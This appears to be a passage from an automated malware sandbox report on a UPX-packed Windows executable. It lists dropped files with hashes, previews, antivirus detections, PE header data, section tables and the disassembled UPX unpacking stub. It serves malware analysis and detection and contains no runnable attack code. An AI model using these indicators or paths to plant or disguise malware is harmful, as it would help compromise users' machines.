                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.0.8.<./.P.i.d.>.......
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8CD.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:55:54 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):176444
                                  Entropy (8bit):1.4577996275971805
                                  Encrypted:false
                                  SSDEEP:384:JcEVfEklxIpBLrvnOY7i+j0JRA+gOO0E33l39:jfoJvOYfj0fA+EVN
                                  MD5:CCDD29807B72EB7B4D4BE8DD77CC45AC
                                  SHA1:9AB126DBF9648EC66E9ADF863A7CB5C05FBA097F
                                  SHA-256:B8D017964A8BB35F155494DE2143E5801FC47A410DF769D7A7B5A5FA84D6AD98
                                  SHA-512:F4F23FDC06A186B2DB0EDF27557E422590ABD16757A20D2E459B0B20F8B64759B4F7EDB87C0F114AAE3781963288E89E787CF127B80B60B0493BF8CD3D97F18F
                                  Malicious:false
                                  Preview: MDMP....... ........4y`...................U...........B......4'......GenuineIntelW...........T............4y`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB40.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4670
                                  Entropy (8bit):4.4972648076746715
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8Bi8fm8M4JmIL1ZFx+q8jLYU/ZzYd:uITfzZ5SNlJv1NCp/ZzYd
                                  MD5:3FBFB6B48EB99E589BDCAE1F91A4D5B3
                                  SHA1:A03C8E93F385BA9A4C43DA55C53587817BE163B6
                                  SHA-256:B2EB07FEB1B6EA275A609C6B6222FB5F92C639740CA1A72DD5BF513415693669
                                  SHA-512:B39D9F8E3F4E80FFF0AECB2B9629614ED506FA3399A67000F903C9CC426D16D400F487D3E040BCB15AF80C0EAD36139511A06DC76E1A78D540E64CEDC1724755
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="948486" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE1A.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:56:01 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):185660
                                  Entropy (8bit):1.4356969576165521
                                  Encrypted:false
                                  SSDEEP:384:Ue2xQbBIhlu48/Hyd+782FXnxOrBqOipQmDabnShq:Ue2xcBm4rdwYYrsOipQ7cq
                                  MD5:80913680B490509D6E99672810F0F795
                                  SHA1:541D2D3193BF97B42277227C56241466C9F30F68
                                  SHA-256:3C7381D8B19DAFA4B1F48A34EFF07766EA8B9CEE875CAC489B99B3F77154EB8A
                                  SHA-512:63C76C33D65C882C22DC450F82FC4507F212B96F228DC8FDC6B571E7DE29500BA6A5C2B3D2A52F6C27B4EC7D939A78824791FD052DD4270F9DF5D607E06583E8
                                  Malicious:false
                                  Preview: MDMP....... ........5y`...................U...........B......d'......GenuineIntelW...........T.......,....4y`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE399.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8290
                                  Entropy (8bit):3.696347378705349
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiaE6Q6YCv69gmfqDSRCprf89bMMRgsfwkm:RrlsNih6Q6YC69gmfqDSJMMRzfi
                                  MD5:FC27787BB04EEB64519B0C5A6D08711C
                                  SHA1:06361E93673221EDF0644B1849A7A52B1737BCE8
                                  SHA-256:CF431E9010D7C89339BDF3EC2CE524A64B4197D5ADA326937C0B1ADD4918A298
                                  SHA-512:1D19BA64A144DE1817632B12A420420C5862E65658D8C4B4857438FB76105AD1054E33829700DCD03B2FA4B0130394C5594D2829549640B36ABC0F2B8D5D4F38
                                  Malicious:false
                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.6.8.<./.P.i.d.>.......
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2AE.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4670
                                  Entropy (8bit):4.498288007192859
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8BV8fm8M4JmIL1ZFZ2+q8jLYUBjZzDd:uITfzZ5SNsJv1ICpBjZzDd
                                  MD5:1F5C5F73930D1DB2442E8E812F8A0B23
                                  SHA1:7BA858F190A5187B1FEEACAA21A1A81AA39D6226
                                  SHA-256:BA14A67A0447A4215B4FD9E0CEB9E9C02A13D8C26B83F85A8F90F82449FADD43
                                  SHA-512:A387495D61933D008117329E73554C62595FB31638607779E5E35CBF7790F82402C225471E3D42D57FD32E4D662FBAAE50A77B1432F820EEF856768A8BDF80EE
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="948486" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF10.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8290
                                  Entropy (8bit):3.691967424613124
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNi3d6WGii6YI760gmfqDSRCprx89bXvsflvdm:RrlsNiN6f6Ys60gmfqDS3XUf2
                                  MD5:5E1DE23855DFAD03C1F4C443FC0A00AE
                                  SHA1:315EEE67D006CCC025360DB03308107C1810AB37
                                  SHA-256:1C8B87B3340CF94EF02BABC84CA96253DC95BFC5827F0852E7F91640F374560B
                                  SHA-512:62AA1F6D7408F880D88933B4F0DEE36B7CA2BA42952F3C0300D4319F69E78ED7D6F8114A7DAB553539849DAE2EA166795C087684D8CED8CE0AA5EF47A5791E5B
                                  Malicious:false
                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.0.8.<./.P.i.d.>.......
                                  C:\Users\user\AppData\Local\Temp\UuU.uUu
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:ASCII text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):1680
                                  Entropy (8bit):3.1705169676874587
                                  Encrypted:false
                                  SSDEEP:48:81jcy2DvQYcxascyjEdfqQrB0FIbyqCJJ:81jcNCascoEYQWe/C7
                                  MD5:1BD90647356DABD3C913893E6FE53869
                                  SHA1:455ADB06D28ADE02E02CC4D2A996045457AEF406
                                  SHA-256:361555CEE16A1B83B44AB187CA98672F85FC03758A89BAA4F23DB34E3A9439E7
                                  SHA-512:35CCCA5C0DA665E90D3A6B7DC90A891562C1D3228D02B486CF04CA4A10755AD4DCBB2EB9BF438A05B1FF16EFFE5D575C8565A70ADF159CE23B939A0D9A5C2700
                                  Malicious:false
                                  Preview: 23:55:3023:55:3021:55:4022:25:5022:56:0023:56:1000:26:2001:26:3001:56:4002:26:5003:27:0003:57:1004:57:1905:57:3006:27:4007:27:4907:28:0007:58:1008:58:2009:28:3010:28:4010:58:5011:29:0011:59:1012:59:2013:29:3013:59:4014:59:5015:30:0016:00:0917:00:1917:30:2918:00:3919:00:4919:30:5920:01:0920:31:1921:31:2922:01:3922:31:4900:01:5800:32:0801:02:1802:02:2803:02:3803:32:4804:02:5805:03:0805:33:1806:03:2807:03:3807:33:4808:33:5709:04:0709:34:1710:34:2711:04:3711:34:4712:34:5713:05:0713:35:1714:35:2715:05:3715:35:4716:35:5717:06:0617:36:1618:36:2619:06:3619:36:4620:36:5621:07:0621:37:1622:07:2623:07:3623:37:4600:07:5601:08:0601:38:1502:08:2503:08:3503:38:4504:08:5504:39:0505:39:2505:39:2506:09:3507:09:4507:39:5508:10:0509:10:1509:40:2510:10:3511:10:4411:40:5412:11:0412:41:1413:41:2414:11:3414:41:4415:11:5416:12:0416:42:1417:12:2418:12:3418:42:4419:12:5320:13:0320:43:1321:13:2322:13:3322:43:4323:13:5323:44:0300:44:1301:14:2301:44:3302:44:4303:14:5203:45:0204:45:1205:15:2205:45:3206:45:4207:15:52
                                  C:\Users\user\AppData\Local\Temp\XX--XX--XX.txt
                                  Process:C:\Windows\install\TEXTURAFIVEM.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):235454
                                  Entropy (8bit):7.963205302258584
                                  Encrypted:false
                                  SSDEEP:3072:ofP5JuXLFG3Oa95BrKUqEQ94jhc3PQuPe2D2ue3NXR0jW/UCFnp7HBIJJyCwFiCT:G5JGmrpQsK3RD2u270jupCJsCxCT
                                  MD5:ABCC5291A7C838FD21888B5206CBBF76
                                  SHA1:B38468DC48FE3A6B6658411BD7F3DEF8A137D688
                                  SHA-256:CDC5568BD80A548282E7E920137770594E5CC915CFC251EFD69BF850D78C7754
                                  SHA-512:6FEFEAAFB90AACD05BDC80BE08EDF8FC865655EB091FA51C217389CFD6A1ED21CCDFC0A3712E7B516F1F1E2DB32908FE70F3A80DEEAE4CA1AEA9C86DA0D5ADA4
                                  Malicious:false
                                  Preview: C:\Windows\install\TEXTURAFIVEM.exe|C:\Windows\install\TEXTURAFIVEM.exe|.................####@####.................####@####.................####@####.................####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@####.Q....####@####...####@####....####@####.####@####..............####@####.......####@####...............####@####...................................####@####....####@####....####@####....####@####..####@####.####@####............####@####................................####@####....####@####....####@####.....####@####............####@####......####@#### ####@####........####@####.&Kj..b####@####..####@####..####@####....####@####.....####@####.....####@####.....####@####....####@####....####@####....####@####....####@####....####@####....####@####....####@####....####@####.####@####...........####@####.....####@####.....####@####...
                                  C:\Users\user\AppData\Local\Temp\XxX.xXx
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:ASCII text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):2736
                                  Entropy (8bit):3.0918318109389906
                                  Encrypted:false
                                  SSDEEP:48:8VHHHJ//yLLHB6AfAfPPPTcccmyItHkYcxQ91qyj+XKQWBEFIbyys9JJ:8VHHHJ//rAfAfPPPHZPCQ91qoEKQ7efq
                                  MD5:A7205743BD5087466B60236F16FB2097
                                  SHA1:2F5B76BED2309829DC3504CDF76A067A85DC2760
                                  SHA-256:D14D6ECB8E92A45D4836BFF504F98CAB64598160BB0B8226B8C5BA1C68C0A803
                                  SHA-512:520FF48DE8B657399278C28AA7B28D7A7159DFFF33A554045C3A5739303E0A590B8DA3C342F1B92D3E76918A54E45E39F2C0CFD1D5BE4DEA353DE6CCD3B6A19C
                                  Malicious:false
                                  Preview: 23:55:3000:25:4000:25:4000:25:4000:55:4001:25:4001:25:4001:25:4001:25:4001:55:4001:55:4001:55:4001:55:4002:25:4002:25:4002:25:4002:55:4002:55:4002:55:4003:25:4003:25:4003:25:4003:55:4003:55:4003:55:4004:25:4004:25:4004:25:4004:55:4004:55:4004:55:4005:25:4005:25:4005:25:4005:25:4005:55:4005:55:4006:25:4006:25:4006:25:4006:25:4006:55:4006:55:4006:55:4007:25:4007:25:4007:55:4007:55:4007:55:4008:25:4008:25:4008:25:4008:55:4008:55:4008:55:4009:25:4009:25:4009:25:4009:25:4009:55:4009:55:4010:25:4010:25:4010:25:4010:25:4010:55:4010:55:4010:55:4011:25:4011:25:4011:55:4011:55:4011:55:4011:55:4012:25:4012:25:4012:25:4012:55:4012:55:4013:25:4013:25:4013:25:4013:55:4013:55:4013:55:4013:55:4014:25:4014:25:4014:25:4014:55:4014:55:4014:55:4015:25:4015:25:4015:25:4015:55:4015:55:4015:55:4016:25:4016:25:4016:25:4016:55:4016:55:4016:55:4016:55:4017:25:4017:25:4017:25:4017:55:4017:55:4017:55:4017:55:4018:25:4018:25:4018:25:4018:55:4018:55:4018:55:4018:55:4019:25:4019:25:4019:25:4019:25:4019:55:4019:55:40
                                  C:\Users\user\AppData\Roaming\logs.dat
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):15
                                  Entropy (8bit):3.2402239289418517
                                  Encrypted:false
                                  SSDEEP:3:WhqgGRn:W4gg
                                  MD5:E21BD9604EFE8EE9B59DC7605B927A2A
                                  SHA1:3240ECC5EE459214344A1BAAC5C2A74046491104
                                  SHA-256:51A3FE220229AA3FDDDC909E20A4B107E7497320A00792A280A03389F2EACB46
                                  SHA-512:42052AD5744AD76494BFA71D78578E545A3B39BFED4C4232592987BD28064B6366A423084F1193D137493C9B13D9AE1FAAC4CF9CC75EB715542FA56E13CA1493
                                  Malicious:false
                                  Preview: ufDQcGGKk..####
                                  C:\Windows\install\TEXTURAFIVEM.exe
                                  Process:C:\Users\user\Desktop\dqH3t8JU1x.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Category:dropped
                                  Size (bytes):282624
                                  Entropy (8bit):7.750298138077895
                                  Encrypted:false
                                  SSDEEP:6144:+k4qmj9BDz1CcpraDKAobj6rSnMtpl4V1h9VC+1aMnKEw+2:h9+zEVDKomcX4V1h4Mnk+
                                  MD5:06E21AF52A3E3E5173A6A53725B1C217
                                  SHA1:273760EA9B8CF2B4E60E48ED7EA96AB92BB3FA1D
                                  SHA-256:61C2D5A213F1B68EF98F2800F02697650CCF28EB38EC07635F0BFFCDF18A803A
                                  SHA-512:45728DF9B579889C9BBD53C2E90BFFDB1A4131052FEBEAFF7C54DC134D62D5217243C191B89F61CDB1425A86ABAE3F5D9AA60F70D2757907F1D112073AA1F0D4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 100%
                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................@...........\... ...`....@..........................p...................@...........................k..t....`.......................................................]......................................................UPX0....................................UPX1.....@... ...>..................@....rsrc........`.......B..............@..............................................................................................................................................................................................................................................................................................................................................................................3.00.UPX!....
                                  C:\Windows\install\TEXTURAFIVEM.exe:Zone.Identifier
                                  Process:C:\Users\user\Desktop\dqH3t8JU1x.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview: [ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.750298138077895
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.37%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  File name:dqH3t8JU1x.exe
                                  File size:282624
                                  MD5:06e21af52a3e3e5173a6a53725b1c217
                                  SHA1:273760ea9b8cf2b4e60e48ed7ea96ab92bb3fa1d
                                  SHA256:61c2d5a213f1b68ef98f2800f02697650ccf28eb38ec07635f0bffcdf18a803a
                                  SHA512:45728df9b579889c9bbd53c2e90bffdb1a4131052febeaff7c54dc134d62d5217243c191b89f61cdb1425a86abae3f5d9aa60f70d2757907f1d112073aa1f0d4
                                  SSDEEP:6144:+k4qmj9BDz1CcpraDKAobj6rSnMtpl4V1h9VC+1aMnKEw+2:h9+zEVDKomcX4V1h4Mnk+
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                  File Icon

                                  Icon Hash:f4f4d2d2f6e6ccd4

                                  Static PE Info

                                  General

                                  Entrypoint:0x455c10
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                  DLL Characteristics:
                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:cba5bd52b3e624400ffe41eb22644b79

                                  Entrypoint Preview

                                  Instruction
                                  pushad
                                  mov esi, 00412000h
                                  lea edi, dword ptr [esi-00011000h]
                                  push edi
                                  or ebp, FFFFFFFFh
                                  jmp 00007FFA388FAFA2h
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAF7Fh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007FFA388FAF9Dh
                                  jne 00007FFA388FAFBAh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAFB1h
                                  dec eax
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007FFA388FAF66h
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007FFA388FAFE4h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007FFA388FAFA3h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007FFA388FB007h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007FFA388FAF9Dh
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAF5Eh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007FFA388FAF50h
                                  add ebx, ebx
                                  jne 00007FFA388FAF99h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007FFA388FAF81h
                                  jne 00007FFA388FAF9Bh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007FFA388FAF76h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [eax+eax]

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x56b080x274.rsrc
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000xb08.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x55dc00x18UPX1
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  UPX00x10000x110000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  UPX10x120000x440000x43e00False0.97196204535data7.75361695117IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc0x560000x10000xe00False0.551897321429data5.57321541531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_ICON0x142440x8a8SVR2 pure executable (Amdahl-UTS) not stripped - version 428919424
                                  RT_ICON0x14aec0x8a8data
                                  RT_ICON0x562480x8a8data
                                  RT_RCDATA0x15c3c0x10data
